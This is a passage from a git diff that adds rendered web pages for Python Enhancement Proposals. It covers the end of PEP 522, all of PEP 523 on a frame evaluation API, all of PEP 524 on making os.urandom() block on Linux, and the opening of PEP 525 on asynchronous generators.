This whole problem was first noticed because 3.5.0 switched that +underlying code to the generate_unpredictable_bytes_or_block behavior, +and it turns out that there are some rare cases where Linux boot +scripts attempted to run a Python program as part of system initialization, the +Python startup sequence blocked while trying to initialize SipHash, +and then this triggered a deadlock because the system stopped doing +anything – including gathering new entropy – until the Python script +was forcibly terminated by an external timer. This is particularly unfortunate +since the scripts in question never processed untrusted input, so there was no +need for SipHash to be initialized with provably unpredictable random data in +the first place. This motivated the change in 3.5.2rc1 to emulate the old +/dev/urandom behavior in all cases (by calling getrandom() in +non-blocking mode, and then falling back to reading /dev/urandom +if the syscall indicates that the /dev/urandom pool is not yet +fully initialized.)

+

We don’t know whether such problems may also exist in the Fedora/RHEL/CentOS +ecosystem, as the build systems for those distributions use chroots on servers +running an older operating system kernel that doesn’t offer the getrandom() +syscall, which means CPython’s current build configuration compiles out the +runtime check for that syscall [10].

+

A similar problem was found due to the random module calling +os.urandom as a side-effect of import in order to seed the default +global random.Random() instance.

+

We have not received any specific complaints regarding direct calls to +os.urandom() or random.SystemRandom() blocking with 3.5.0 or 3.5.1 - +only problem reports due to the implicit blocking on interpreter startup and +as a side-effect of importing the random module.

+

Independently of this PEP, the first two cases have already been updated to +never block, regardless of the behaviour of os.urandom().

+

Where PEP 524 proposes to make all 3 of the latter cases block implicitly, +this PEP proposes that approach only for the last case (the secrets) +module, with os.urandom() and random.SystemRandom() instead raising +an exception when they detect that the underlying operating system call +would block.

+
+
+
+

References

+ +

For additional background details beyond those captured in this PEP and Victor’s +competing PEP, also see Victor’s prior collection of relevant information and +links at https://haypo-notes.readthedocs.io/summary_python_random_issue.html

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0522.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0523/index.html b/pep-0523/index.html new file mode 100644 index 00000000000..100280957ff --- /dev/null +++ b/pep-0523/index.html @@ -0,0 +1,535 @@ + + + + + + + + PEP 523 – Adding a frame evaluation API to CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 523 – Adding a frame evaluation API to CPython

+
+
Author:
+
Brett Cannon <brett at python.org>, +Dino Viehland <dinov at microsoft.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-May-2016
+
Python-Version:
+
3.6
+
Post-History:
+
16-May-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to expand CPython’s C API [2] to allow for +the specification of a per-interpreter function pointer to handle the +evaluation of frames [5]. This proposal also +suggests adding a new field to code objects [3] to store +arbitrary data for use by the frame evaluation function.

+
+
+

Rationale

+

One place where flexibility has been lacking in Python is in the direct +execution of Python code. While CPython’s C API [2] allows for +constructing the data going into a frame object and then evaluating it +via PyEval_EvalFrameEx() [5], control over the +execution of Python code comes down to individual objects instead of a +holistic control of execution at the frame level.

+

While wanting to have influence over frame evaluation may seem a bit +too low-level, it does open the possibility for things such as a +method-level JIT to be introduced into CPython without CPython itself +having to provide one. By allowing external C code to control frame +evaluation, a JIT can participate in the execution of Python code at +the key point where evaluation occurs. This then allows for a JIT to +conditionally recompile Python bytecode to machine code as desired +while still allowing for executing regular CPython bytecode when +running the JIT is not desired. This can be accomplished by allowing +interpreters to specify what function to call to evaluate a frame. And +by placing the API at the frame evaluation level it allows for a +complete view of the execution environment of the code for the JIT.

+

This ability to specify a frame evaluation function also allows for +other use-cases beyond just opening CPython up to a JIT. For instance, +it would not be difficult to implement a tracing or profiling function +at the call level with this API. While CPython does provide the +ability to set a tracing or profiling function at the Python level, +this would be able to match the data collection of the profiler and +quite possibly be faster for tracing by simply skipping per-line +tracing support.

+

It also opens up the possibility of debugging where the frame +evaluation function only performs special debugging work when it +detects it is about to execute a specific code object. In that +instance the bytecode could be theoretically rewritten in-place to +inject a breakpoint function call at the proper point for help in +debugging while not having to do a heavy-handed approach as +required by sys.settrace().

+

To help facilitate these use-cases, we are also proposing the adding +of a “scratch space” on code objects via a new field. This will allow +per-code object data to be stored with the code object itself for easy +retrieval by the frame evaluation function as necessary. The field +itself will simply be a PyObject * type so that any data stored in +the field will participate in normal object memory management.

+
+
+

Proposal

+

All proposed C API changes below will not be part of the stable ABI.

+
+

Expanding PyCodeObject

+

One field is to be added to the PyCodeObject struct +[3]:

+
typedef struct {
+   ...
+   void *co_extra;  /* "Scratch space" for the code object. */
+} PyCodeObject;
+
+
+

The co_extra will be NULL by default and only filled in as +needed. Values stored in the field are expected to not be required +in order for the code object to function, allowing the loss of the +data of the field to be acceptable.

+

A private API has been introduced to work with the field:

+
PyAPI_FUNC(Py_ssize_t) _PyEval_RequestCodeExtraIndex(freefunc);
+PyAPI_FUNC(int) _PyCode_GetExtra(PyObject *code, Py_ssize_t index,
+                                 void **extra);
+PyAPI_FUNC(int) _PyCode_SetExtra(PyObject *code, Py_ssize_t index,
+                                 void *extra);
+
+
+

Users of the field are expected to call +_PyEval_RequestCodeExtraIndex() to receive (what should be +considered) an opaque index value to adding data into co-extra. +With that index, users can set data using _PyCode_SetExtra() and +later retrieve the data with _PyCode_GetExtra(). The API is +purposefully listed as private to communicate the fact that there are +no semantic guarantees of the API between Python releases.

+

Using a list and tuple were considered but was found to be less +performant, and with a key use-case being JIT usage the performance +consideration won out for using a custom struct instead of a Python +object.

+

A dict was also considered, but once again performance was more +important. While a dict will have constant overhead in looking up +data, the overhead for the common case of a single object being stored +in the data structure leads to a tuple having better performance +characteristics (i.e. iterating a tuple of length 1 is faster than +the overhead of hashing and looking up an object in a dict).

+
+
+

Expanding PyInterpreterState

+

The entrypoint for the frame evaluation function is per-interpreter:

+
// Same type signature as PyEval_EvalFrameEx().
+typedef PyObject* (*_PyFrameEvalFunction)(PyFrameObject*, int);
+
+typedef struct {
+    ...
+    _PyFrameEvalFunction eval_frame;
+} PyInterpreterState;
+
+
+

By default, the eval_frame field will be initialized to a function +pointer that represents what PyEval_EvalFrameEx() currently is +(called _PyEval_EvalFrameDefault(), discussed later in this PEP). +Third-party code may then set their own frame evaluation function +instead to control the execution of Python code. A pointer comparison +can be used to detect if the field is set to +_PyEval_EvalFrameDefault() and thus has not been mutated yet.

+
+
+

Changes to Python/ceval.c

+

PyEval_EvalFrameEx() [5] as it currently stands +will be renamed to _PyEval_EvalFrameDefault(). The new +PyEval_EvalFrameEx() will then become:

+
PyObject *
+PyEval_EvalFrameEx(PyFrameObject *frame, int throwflag)
+{
+    PyThreadState *tstate = PyThreadState_GET();
+    return tstate->interp->eval_frame(frame, throwflag);
+}
+
+
+

This allows third-party code to place themselves directly in the path +of Python code execution while being backwards-compatible with code +already using the pre-existing C API.

+
+
+

Updating python-gdb.py

+

The generated python-gdb.py file used for Python support in GDB +makes some hard-coded assumptions about PyEval_EvalFrameEx(), e.g. +the names of local variables. It will need to be updated to work with +the proposed changes.

+
+
+
+

Performance impact

+

As this PEP is proposing an API to add pluggability, performance +impact is considered only in the case where no third-party code has +made any changes.

+

Several runs of pybench [14] consistently showed no performance +cost from the API change alone.

+

A run of the Python benchmark suite [9] showed no +measurable cost in performance.

+

In terms of memory impact, since there are typically not many CPython +interpreters executing in a single process that means the impact of +co_extra being added to PyCodeObject is the only worry. +According to [8], a run of the Python test suite +results in about 72,395 code objects being created. On a 64-bit +CPU that would result in 579,160 bytes of extra memory being used if +all code objects were alive at once and had nothing set in their +co_extra fields.

+
+
+

Example Usage

+
+

A JIT for CPython

+
+

Pyjion

+

The Pyjion project [1] has used this proposed API to implement +a JIT for CPython using the CoreCLR’s JIT [4]. Each code +object has its co_extra field set to a PyjionJittedCode object +which stores four pieces of information:

+
    +
  1. Execution count
  2. +
  3. A boolean representing whether a previous attempt to JIT failed
  4. +
  5. A function pointer to a trampoline (which can be type tracing or not)
  6. +
  7. A void pointer to any JIT-compiled machine code
  8. +
+

The frame evaluation function has (roughly) the following algorithm:

+
def eval_frame(frame, throw_flag):
+    pyjion_code = frame.code.co_extra
+    if not pyjion_code:
+        frame.code.co_extra = PyjionJittedCode()
+    elif not pyjion_code.jit_failed:
+        if not pyjion_code.jit_code:
+            return pyjion_code.eval(pyjion_code.jit_code, frame)
+        elif pyjion_code.exec_count > 20_000:
+            if jit_compile(frame):
+                return pyjion_code.eval(pyjion_code.jit_code, frame)
+            else:
+                pyjion_code.jit_failed = True
+    pyjion_code.exec_count += 1
+    return _PyEval_EvalFrameDefault(frame, throw_flag)
+
+
+

The key point, though, is that all of this work and logic is separate +from CPython and yet with the proposed API changes it is able to +provide a JIT that is compliant with Python semantics (as of this +writing, performance is almost equivalent to CPython without the new +API). This means there’s nothing technically preventing others from +implementing their own JITs for CPython by utilizing the proposed API.

+
+
+

Other JITs

+

It should be mentioned that the Pyston team was consulted on an +earlier version of this PEP that was more JIT-specific and they were +not interested in utilizing the changes proposed because they want +control over memory layout they had no interest in directly supporting +CPython itself. An informal discussion with a developer on the PyPy +team led to a similar comment.

+

Numba [6], on the other hand, suggested that they would be +interested in the proposed change in a post-1.0 future for +themselves [7].

+

The experimental Coconut JIT [13] could have benefitted from +this PEP. In private conversations with Coconut’s creator we were told +that our API was probably superior to the one they developed for +Coconut to add JIT support to CPython.

+
+
+
+

Debugging

+

In conversations with the Python Tools for Visual Studio team (PTVS) +[12], they thought they would find these API changes useful for +implementing more performant debugging. As mentioned in the Rationale +section, this API would allow for switching on debugging functionality +only in frames where it is needed. This could allow for either +skipping information that sys.settrace() normally provides and +even go as far as to dynamically rewrite bytecode prior to execution +to inject e.g. breakpoints in the bytecode.

+

It also turns out that Google provides a very similar API +internally. It has been used for performant debugging purposes.

+
+
+
+

Implementation

+

A set of patches implementing the proposed API is available through +the Pyjion project [1]. In its current form it has more +changes to CPython than just this proposed API, but that is for ease +of development instead of strict requirements to accomplish its goals.

+
+
+

Open Issues

+
+

Allow eval_frame to be NULL

+

Currently the frame evaluation function is expected to always be set. +It could very easily simply default to NULL instead which would +signal to use _PyEval_EvalFrameDefault(). The current proposal of +not special-casing the field seemed the most straightforward, but it +does require that the field not accidentally be cleared, else a crash +may occur.

+
+
+
+

Rejected Ideas

+
+

A JIT-specific C API

+

Originally this PEP was going to propose a much larger API change +which was more JIT-specific. After soliciting feedback from the Numba +team [6], though, it became clear that the API was unnecessarily +large. The realization was made that all that was truly needed was the +opportunity to provide a trampoline function to handle execution of +Python code that had been JIT-compiled and a way to attach that +compiled machine code along with other critical data to the +corresponding Python code object. Once it was shown that there was no +loss in functionality or in performance while minimizing the API +changes required, the proposal was changed to its current form.

+
+
+

Is co_extra needed?

+

While discussing this PEP at PyCon US 2016, some core developers +expressed their worry of the co_extra field making code objects +mutable. The thinking seemed to be that having a field that was +mutated after the creation of the code object made the object seem +mutable, even though no other aspect of code objects changed.

+

The view of this PEP is that the co_extra field doesn’t change the +fact that code objects are immutable. The field is specified in this +PEP to not contain information required to make the code object +usable, making it more of a caching field. It could be viewed as +similar to the UTF-8 cache that string objects have internally; +strings are still considered immutable even though they have a field +that is conditionally set.

+

Performance measurements were also made where the field was not +available for JIT workloads. The loss of the field was deemed too +costly to performance when using an unordered map from C++ or Python’s +dict to associated a code object with JIT-specific data objects.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0523.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0524/index.html b/pep-0524/index.html new file mode 100644 index 00000000000..7fa68837112 --- /dev/null +++ b/pep-0524/index.html @@ -0,0 +1,679 @@ + + + + + + + + PEP 524 – Make os.urandom() blocking on Linux | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 524 – Make os.urandom() blocking on Linux

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-Jun-2016
+
Python-Version:
+
3.6
+
+
+
+
Table of Contents +
+
+

Abstract

+

Modify os.urandom() to block on Linux 3.17 and newer until the OS +urandom is initialized to increase the security.

+

Add also a new os.getrandom() function (for Linux and Solaris) to be +able to choose how to handle when os.urandom() is going to block on +Linux.

+
+
+

The bug

+
+

Original bug

+

Python 3.5.0 was enhanced to use the new getrandom() syscall +introduced in Linux 3.17 and Solaris 11.3. The problem is that users +started to complain that Python 3.5 blocks at startup on Linux in +virtual machines and embedded devices: see issues #25420 and #26839.

+

On Linux, getrandom(0) blocks until the kernel initialized urandom +with 128 bits of entropy. The issue #25420 describes a Linux build +platform blocking at import random. The issue #26839 describes a +short Python script used to compute a MD5 hash, systemd-cron, script +called very early in the init process. The system initialization blocks +on this script which blocks on getrandom(0) to initialize Python.

+

The Python initialization requires random bytes to implement a +counter-measure against the hash denial-of-service (hash DoS), see:

+ +

Importing the random module creates an instance of +random.Random: random._inst. On Python 3.5, random.Random +constructor reads 2500 bytes from os.urandom() to seed a Mersenne +Twister RNG (random number generator).

+

Other platforms may be affected by this bug, but in practice, only Linux +systems use Python scripts to initialize the system.

+
+
+

Status in Python 3.5.2

+

Python 3.5.2 behaves like Python 2.7 and Python 3.4. If the system +urandom is not initialized, the startup does not block, but +os.urandom() can return low-quality entropy (even it is not easily +guessable).

+
+
+
+

Use Cases

+

The following use cases are used to help to choose the right compromise +between security and practicability.

+
+

Use Case 1: init script

+

Use a Python 3 script to initialize the system, like systemd-cron. If +the script blocks, the system initialize is stuck too. The issue #26839 +is a good example of this use case.

+
+

Use case 1.1: No secret needed

+

If the init script doesn’t have to generate any secure secret, this use +case is already handled correctly in Python 3.5.2: Python startup +doesn’t block on system urandom anymore.

+
+
+

Use case 1.2: Secure secret required

+

If the init script has to generate a secure secret, there is no safe +solution.

+

Falling back to weak entropy is not acceptable, it would +reduce the security of the program.

+

Python cannot produce itself secure entropy, it can only wait until +system urandom is initialized. But in this use case, the whole system +initialization is blocked by this script, so the system fails to boot.

+

The real answer is that the system initialization must not be blocked by +such script. It is ok to start the script very early at system +initialization, but the script may blocked a few seconds until it is +able to generate the secret.

+

Reminder: in some cases, the initialization of the system urandom never +occurs and so programs waiting for system urandom blocks forever.

+
+
+
+

Use Case 2: Web server

+

Run a Python 3 web server serving web pages using HTTP and HTTPS +protocols. The server is started as soon as possible.

+

The first target of the hash DoS attack was web server: it’s important +that the hash secret cannot be easily guessed by an attacker.

+

If serving a web page needs a secret to create a cookie, create an +encryption key, …, the secret must be created with good entropy: +again, it must be hard to guess the secret.

+

A web server requires security. If a choice must be made between +security and running the server with weak entropy, security is more +important. If there is no good entropy: the server must block or fail +with an error.

+

The question is if it makes sense to start a web server on a host before +system urandom is initialized.

+

The issues #25420 and #26839 are restricted to the Python startup, not +to generate a secret before the system urandom is initialized.

+
+
+
+

Fix system urandom

+
+

Load entropy from disk at boot

+

Collecting entropy can take up to several minutes. To accelerate the +system initialization, operating systems store entropy on disk at +shutdown, and then reload entropy from disk at the boot.

+

If a system collects enough entropy at least once, the system urandom +will be initialized quickly, as soon as the entropy is reloaded from +disk.

+
+
+

Virtual machines

+

Virtual machines don’t have a direct access to the hardware and so have +less sources of entropy than bare metal. A solution is to add a +virtio-rng device to pass entropy +from the host to the virtual machine.

+
+
+

Embedded devices

+

A solution for embedded devices is to plug an hardware RNG.

+

For example, Raspberry Pi have an hardware RNG but it’s not used by +default. See: Hardware RNG on Raspberry Pi.

+
+
+
+

Denial-of-service when reading random

+
+

Don’t use /dev/random but /dev/urandom

+

The /dev/random device should only used for very specific use cases. +Reading from /dev/random on Linux is likely to block. Users don’t +like when an application blocks longer than 5 seconds to generate a +secret. It is only expected for specific cases like generating +explicitly an encryption key.

+

When the system has no available entropy, choosing between blocking +until entropy is available or falling back on lower quality entropy is a +matter of compromise between security and practicability. The choice +depends on the use case.

+

On Linux, /dev/urandom is secure, it should be used instead of +/dev/random. See Myths about /dev/urandom by Thomas Hühn: “Fact: +/dev/urandom is the preferred source of cryptographic randomness on +UNIX-like systems”

+
+
+

getrandom(size, 0) can block forever on Linux

+

The origin of the Python issue #26839 is the Debian bug +report #822431: in fact, +getrandom(size, 0) blocks forever on the virtual machine. The system +succeeded to boot because systemd killed the blocked process after 90 +seconds.

+

Solutions like Load entropy from disk at boot reduces the risk of +this bug.

+
+
+
+

Rationale

+

On Linux, reading the /dev/urandom can return “weak” entropy before +urandom is fully initialized, before the kernel collected 128 bits of +entropy. Linux 3.17 adds a new getrandom() syscall which allows to +block until urandom is initialized.

+

On Python 3.5.2, os.urandom() uses the +getrandom(size, GRND_NONBLOCK), but falls back on reading the +non-blocking /dev/urandom if getrandom(size, GRND_NONBLOCK) +fails with EAGAIN.

+

Security experts promotes os.urandom() to generate cryptographic +keys because it is implemented with a Cryptographically secure +pseudo-random number generator (CSPRNG). +By the way, os.urandom() is preferred over ssl.RAND_bytes() for +different reasons.

+

This PEP proposes to modify os.urandom() to use getrandom() in +blocking mode to not return weak entropy, but also ensure that Python +will not block at startup.

+
+
+

Changes

+
+

Make os.urandom() blocking on Linux

+

All changes described in this section are specific to the Linux +platform.

+

Changes:

+
    +
  • Modify os.urandom() to block until system urandom is initialized: +os.urandom() (C function _PyOS_URandom()) is modified to +always call getrandom(size, 0) (blocking mode) on Linux and +Solaris.
  • +
  • Add a new private _PyOS_URandom_Nonblocking() function: try to +call getrandom(size, GRND_NONBLOCK) on Linux and Solaris, but +falls back on reading /dev/urandom if it fails with EAGAIN.
  • +
  • Initialize hash secret from non-blocking system urandom: +_PyRandom_Init() is modified to call +_PyOS_URandom_Nonblocking().
  • +
  • random.Random constructor now uses non-blocking system urandom: it +is modified to use internally the new _PyOS_URandom_Nonblocking() +function to seed the RNG.
  • +
+
+
+

Add a new os.getrandom() function

+

A new os.getrandom(size, flags=0) function is added: use +getrandom() syscall on Linux and getrandom() C function on +Solaris.

+

The function comes with 2 new flags:

+
    +
  • os.GRND_RANDOM: read bytes from /dev/random rather than +reading /dev/urandom
  • +
  • os.GRND_NONBLOCK: raise a BlockingIOError if os.getrandom() +would block
  • +
+

The os.getrandom() is a thin wrapper on the getrandom() +syscall/C function and so inherit of its behaviour. For example, on +Linux, it can return less bytes than requested if the syscall is +interrupted by a signal.

+
+
+
+

Examples using os.getrandom()

+
+

Best-effort RNG

+

Example of a portable non-blocking RNG function: try to get random bytes +from the OS urandom, or fallback on the random module.

+
def best_effort_rng(size):
+    # getrandom() is only available on Linux and Solaris
+    if not hasattr(os, 'getrandom'):
+        return os.urandom(size)
+
+    result = bytearray()
+    try:
+        # need a loop because getrandom() can return less bytes than
+        # requested for different reasons
+        while size:
+            data = os.getrandom(size, os.GRND_NONBLOCK)
+            result += data
+            size -= len(data)
+    except BlockingIOError:
+        # OS urandom is not initialized yet:
+        # fallback on the Python random module
+        data = bytes(random.randrange(256) for byte in range(size))
+        result += data
+    return bytes(result)
+
+
+

This function can block in theory on a platform where +os.getrandom() is not available but os.urandom() can block.

+
+
+

wait_for_system_rng()

+

Example of function waiting timeout seconds until the OS urandom is +initialized on Linux or Solaris:

+
def wait_for_system_rng(timeout, interval=1.0):
+    if not hasattr(os, 'getrandom'):
+        return
+
+    deadline = time.monotonic() + timeout
+    while True:
+        try:
+            os.getrandom(1, os.GRND_NONBLOCK)
+        except BlockingIOError:
+            pass
+        else:
+            return
+
+        if time.monotonic() > deadline:
+            raise Exception('OS urandom not initialized after %s seconds'
+                            % timeout)
+
+        time.sleep(interval)
+
+
+

This function is not portable. For example, os.urandom() can block +on FreeBSD in theory, at the early stage of the system initialization.

+
+
+

Create a best-effort RNG

+

Simpler example to create a non-blocking RNG on Linux: choose between +Random.SystemRandom and Random.Random depending if +getrandom(size) would block.

+
def create_nonblocking_random():
+    if not hasattr(os, 'getrandom'):
+        return random.Random()
+
+    try:
+        os.getrandom(1, os.GRND_NONBLOCK)
+    except BlockingIOError:
+        return random.Random()
+    else:
+        return random.SystemRandom()
+
+
+

This function is not portable. For example, random.SystemRandom +can block on FreeBSD in theory, at the early stage of the system +initialization.

+
+
+
+

Alternative

+
+

Leave os.urandom() unchanged, add os.getrandom()

+

os.urandom() remains unchanged: never block, but it can return weak +entropy if system urandom is not initialized yet.

+

Only add the new os.getrandom() function (wrapper to the +getrandom() syscall/C function).

+

The secrets.token_bytes() function should be used to write portable +code.

+

The problem with this change is that it expects that users understand +well security and know well each platforms. Python has the tradition of +hiding “implementation details”. For example, os.urandom() is not a +thin wrapper to the /dev/urandom device: it uses +CryptGenRandom() on Windows, it uses getentropy() on OpenBSD, it +tries getrandom() on Linux and Solaris or falls back on reading +/dev/urandom. Python already uses the best available system RNG +depending on the platform.

+

This PEP does not change the API:

+
    +
  • os.urandom(), random.SystemRandom and secrets for security
  • +
  • random module (except random.SystemRandom) for all other usages
  • +
+
+
+

Raise BlockingIOError in os.urandom()

+
+

Proposition

+

PEP 522: Allow BlockingIOError in security sensitive APIs on Linux.

+

Python should not decide for the developer how to handle The bug: +raising immediately a BlockingIOError if os.urandom() is going to +block allows developers to choose how to handle this case:

+
    +
  • catch the exception and falls back to a non-secure entropy source: +read /dev/urandom on Linux, use the Python random module +(which is not secure at all), use time, use process identifier, etc.
  • +
  • don’t catch the error, the whole program fails with this fatal +exception
  • +
+

More generally, the exception helps to notify when sometimes goes wrong. +The application can emit a warning when it starts to wait for +os.urandom().

+
+
+

Criticism

+

For the use case 2 (web server), falling back on non-secure entropy is +not acceptable. The application must handle BlockingIOError: poll +os.urandom() until it completes. Example:

+
def secret(n=16):
+    try:
+        return os.urandom(n)
+    except BlockingIOError:
+        pass
+
+    print("Wait for system urandom initialization: move your "
+          "mouse, use your keyboard, use your disk, ...")
+    while 1:
+        # Avoid busy-loop: sleep 1 ms
+        time.sleep(0.001)
+        try:
+            return os.urandom(n)
+        except BlockingIOError:
+            pass
+
+
+

For correctness, all applications which must generate a secure secret +must be modified to handle BlockingIOError even if The bug is +unlikely.

+

The case of applications using os.urandom() but don’t really require +security is not well defined. Maybe these applications should not use +os.urandom() at the first place, but always the non-blocking +random module. If os.urandom() is used for security, we are back +to the use case 2 described above: Use Case 2: Web server. If a +developer doesn’t want to drop os.urandom(), the code should be +modified. Example:

+
def almost_secret(n=16):
+    try:
+        return os.urandom(n)
+    except BlockingIOError:
+        return bytes(random.randrange(256) for byte in range(n))
+
+
+

The question is if The bug is common enough to require that so many +applications have to be modified.

+

Another simpler choice is to refuse to start before the system urandom +is initialized:

+
def secret(n=16):
+    try:
+        return os.urandom(n)
+    except BlockingIOError:
+        print("Fatal error: the system urandom is not initialized")
+        print("Wait a bit, and rerun the program later.")
+        sys.exit(1)
+
+
+

Compared to Python 2.7, Python 3.4 and Python 3.5.2 where os.urandom() +never blocks nor raise an exception on Linux, such behaviour change can +be seen as a major regression.

+
+
+
+

Add an optional block parameter to os.urandom()

+

See the issue #27250: Add os.urandom_block().

+

Add an optional block parameter to os.urandom(). The default value may +be True (block by default) or False (non-blocking).

+

The first technical issue is to implement os.urandom(block=False) on +all platforms. Only Linux 3.17 (and newer) and Solaris 11.3 (and newer) +have a well defined non-blocking API (getrandom(size, +GRND_NONBLOCK)).

+

As Raise BlockingIOError in os.urandom(), it doesn’t seem worth it to +make the API more complex for a theoretical (or at least very rare) use +case.

+

As Leave os.urandom() unchanged, add os.getrandom(), the problem is +that it makes the API more complex and so more error-prone.

+
+
+
+

Acceptance

+

The PEP was accepted on 2016-08-08 by Guido van Rossum.

+
+
+

Annexes

+
+

Operating system random functions

+

os.urandom() uses the following functions:

+ +

On Linux, commands to get the status of /dev/random (results are +number of bytes):

+
$ cat /proc/sys/kernel/random/entropy_avail
+2850
+$ cat /proc/sys/kernel/random/poolsize
+4096
+
+
+
+
+

Why using os.urandom()?

+

Since os.urandom() is implemented in the kernel, it doesn’t have +issues of user-space RNG. For example, it is much harder to get its +state. It is usually built on a CSPRNG, so even if its state is +“stolen”, it is hard to compute previously generated numbers. The kernel +has a good knowledge of entropy sources and feed regularly the entropy +pool.

+

That’s also why os.urandom() is preferred over ssl.RAND_bytes().

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0524.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0525/index.html b/pep-0525/index.html new file mode 100644 index 00000000000..eacfd35efff --- /dev/null +++ b/pep-0525/index.html @@ -0,0 +1,750 @@ + + + + + + + + PEP 525 – Asynchronous Generators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 525 – Asynchronous Generators

+
+
Author:
+
Yury Selivanov <yury at edgedb.com>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Jul-2016
+
Python-Version:
+
3.6
+
Post-History:
+
02-Aug-2016, 23-Aug-2016, 01-Sep-2016, 06-Sep-2016
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 492 introduced support for native coroutines and async/await +syntax to Python 3.5. It is proposed here to extend Python’s +asynchronous capabilities by adding support for +asynchronous generators.

+
+
+

Rationale and Goals

+

Regular generators (introduced in PEP 255) enabled an elegant way of +writing complex data producers and have them behave like an iterator.

+

However, currently there is no equivalent concept for the asynchronous +iteration protocol (async for). This makes writing asynchronous +data producers unnecessarily complex, as one must define a class that +implements __aiter__ and __anext__ to be able to use it in +an async for statement.

+

Essentially, the goals and rationale for PEP 255, applied to the +asynchronous execution case, hold true for this proposal as well.

+

Performance is an additional point for this proposal: in our testing of +the reference implementation, asynchronous generators are 2x faster +than an equivalent implemented as an asynchronous iterator.

+

As an illustration of the code quality improvement, consider the +following class that prints numbers with a given delay once iterated:

+
class Ticker:
+    """Yield numbers from 0 to `to` every `delay` seconds."""
+
+    def __init__(self, delay, to):
+        self.delay = delay
+        self.i = 0
+        self.to = to
+
+    def __aiter__(self):
+        return self
+
+    async def __anext__(self):
+        i = self.i
+        if i >= self.to:
+            raise StopAsyncIteration
+        self.i += 1
+        if i:
+            await asyncio.sleep(self.delay)
+        return i
+
+
+

The same can be implemented as a much simpler asynchronous generator:

+
async def ticker(delay, to):
+    """Yield numbers from 0 to `to` every `delay` seconds."""
+    for i in range(to):
+        yield i
+        await asyncio.sleep(delay)
+
+
+
+
+

Specification

+

This proposal introduces the concept of asynchronous generators to +Python.

+

This specification presumes knowledge of the implementation of +generators and coroutines in Python (PEP 342, PEP 380 and PEP 492).

+
+

Asynchronous Generators

+

A Python generator is any function containing one or more yield +expressions:

+
def func():            # a function
+    return
+
+def genfunc():         # a generator function
+    yield
+
+
+

We propose to use the same approach to define +asynchronous generators:

+
async def coro():      # a coroutine function
+    await smth()
+
+async def asyncgen():  # an asynchronous generator function
+    await smth()
+    yield 42
+
+
+

The result of calling an asynchronous generator function is +an asynchronous generator object, which implements the asynchronous +iteration protocol defined in PEP 492.

+

It is a SyntaxError to have a non-empty return statement in an +asynchronous generator.

+
+
+

Support for Asynchronous Iteration Protocol

+

The protocol requires two special methods to be implemented:

+
    +
  1. An __aiter__ method returning an asynchronous iterator.
  2. +
  3. An __anext__ method returning an awaitable object, which uses +StopIteration exception to “yield” values, and +StopAsyncIteration exception to signal the end of the iteration.
  4. +
+

Asynchronous generators define both of these methods. Let’s manually +iterate over a simple asynchronous generator:

+
async def genfunc():
+    yield 1
+    yield 2
+
+gen = genfunc()
+
+assert gen.__aiter__() is gen
+
+assert await gen.__anext__() == 1
+assert await gen.__anext__() == 2
+
+await gen.__anext__()  # This line will raise StopAsyncIteration.
+
+
+
+
+

Finalization

+

PEP 492 requires an event loop or a scheduler to run coroutines. +Because asynchronous generators are meant to be used from coroutines, +they also require an event loop to run and finalize them.

+

Asynchronous generators can have try..finally blocks, as well as +async with. It is important to provide a guarantee that, even +when partially iterated, and then garbage collected, generators can +be safely finalized. For example:

+
async def square_series(con, to):
+    async with con.transaction():
+        cursor = con.cursor(
+            'SELECT generate_series(0, $1) AS i', to)
+        async for row in cursor:
+            yield row['i'] ** 2
+
+async for i in square_series(con, 1000):
+    if i == 100:
+        break
+
+
+

The above code defines an asynchronous generator that uses +async with to iterate over a database cursor in a transaction. +The generator is then iterated over with async for, which interrupts +the iteration at some point.

+

The square_series() generator will then be garbage collected, +and without a mechanism to asynchronously close the generator, Python +interpreter would not be able to do anything.

+

To solve this problem we propose to do the following:

+
    +
  1. Implement an aclose method on asynchronous generators +returning a special awaitable. When awaited it +throws a GeneratorExit into the suspended generator and +iterates over it until either a GeneratorExit or +a StopAsyncIteration occur.

    This is very similar to what the close() method does to regular +Python generators, except that an event loop is required to execute +aclose().

    +
  2. +
  3. Raise a RuntimeError, when an asynchronous generator executes +a yield expression in its finally block (using await +is fine, though):
    async def gen():
    +    try:
    +        yield
    +    finally:
    +        await asyncio.sleep(1)   # Can use 'await'.
    +
    +        yield                    # Cannot use 'yield',
    +                                 # this line will trigger a
    +                                 # RuntimeError.
    +
    +
    +
  4. +
  5. Add two new methods to the sys module: +set_asyncgen_hooks() and get_asyncgen_hooks().
  6. +
+

The idea behind sys.set_asyncgen_hooks() is to allow event +loops to intercept asynchronous generators iteration and finalization, +so that the end user does not need to care about the finalization +problem, and everything just works.

+

sys.set_asyncgen_hooks() accepts two arguments:

+
    +
  • firstiter: a callable which will be called when an asynchronous +generator is iterated for the first time.
  • +
  • finalizer: a callable which will be called when an asynchronous +generator is about to be GCed.
  • +
+

